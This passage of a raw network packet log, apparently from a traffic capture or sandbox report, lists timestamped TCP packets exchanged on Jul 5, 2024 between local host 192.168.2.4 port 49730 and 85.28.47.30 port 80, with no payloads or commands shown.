                                                                Jul 5, 2024 04:36:07.099765062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099776983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099780083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099792004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099803925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099807978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099841118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099879026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099890947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099903107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099912882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099925995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099939108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099965096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100001097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100013018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100024939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100054026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100058079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100069046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100076914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100080967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100100040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100105047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100114107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100123882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100123882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100136042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100162029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100174904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100186110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100188971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100203037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100214958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100225925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100244999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100253105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100256920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100294113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100327969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100389004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100409031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100419998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100430965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100461006 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100485086 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100491047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100502968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100514889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100523949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100552082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100564957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100749016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100759029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100807905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100815058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100826025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100841045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100857973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100869894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100872993 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100879908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100903988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100915909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.100934982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100946903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.100986958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101005077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101016045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101035118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101052999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101059914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101067066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101078033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101100922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101104975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101114035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101118088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101130009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101161003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101176977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101187944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101200104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101210117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101221085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101234913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101243973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101248026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101260900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101268053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101274014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101285934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101298094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101325035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101332903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101342916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101356983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101367950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101385117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101413965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101428986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101440907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101474047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101504087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101515055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101525068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101538897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101551056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101555109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101562023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101576090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101598024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101613998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101620913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101632118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101643085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101659060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101670027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101696968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101706028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101708889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101721048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101730108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101751089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101753950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101767063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101772070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101777077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101799011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101799965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101814032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101824045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101824999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101841927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101850033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101855040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101875067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101901054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.101978064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101989031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.101999998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102025032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102027893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102037907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102047920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102049112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102072001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102072954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102083921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102092028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102097988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102108002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102118015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102133036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102159023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102184057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102195024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102205992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102221966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102233887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102241039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102252960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102266073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102272034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102277040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102299929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102303028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102310896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102315903 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102324963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102336884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102345943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.102348089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102376938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.102390051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.190843105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.190855026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.190871954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.190895081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.190905094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.190916061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.190918922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.190926075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.190938950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.190951109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.190984964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191272020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191328049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191353083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191363096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191373110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191385984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191399097 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191426992 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191499949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191512108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191523075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191540956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191548109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191553116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191569090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191570044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191585064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191596031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191596985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191607952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191618919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191621065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191632032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191641092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191672087 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191684961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191734076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191791058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191808939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191823006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191843033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191854000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191874981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191878080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191884995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191898108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191910982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191920996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191931009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191958904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191962004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.191973925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191987038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.191998959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192025900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.192048073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.192070007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192082882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192095041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192106962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192121029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192125082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.192137957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.192141056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192157030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192169905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.192193985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192199945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.192204952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192219019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192230940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192249060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.192264080 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.192908049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192920923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192933083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192966938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.192975044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.192979097 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.192989111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193001032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193015099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193027020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193054914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193079948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193093061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193109035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193120956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193130016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193134069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193164110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193173885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193289042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193301916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193312883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193325996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193341017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193344116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193358898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193371058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193372965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193387985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193387985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193416119 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193423986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193434954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193442106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193445921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193460941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193469048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193473101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193486929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193496943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193499088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193506956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193515062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193537951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193550110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193562984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193564892 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193573952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193609953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193634033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193660021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193671942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193684101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193696022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193706989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193716049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193727016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193739891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193741083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193753004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193779945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193794966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193837881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193850994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193862915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193875074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193886042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193891048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193897963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193911076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193921089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193929911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193958044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.193968058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193980932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.193999052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194010973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194019079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194022894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194036961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194041967 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194050074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194061995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194072962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194075108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194102049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194123030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194152117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194163084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194175005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194206953 CEST4973080192.168.2.485.28.47.30
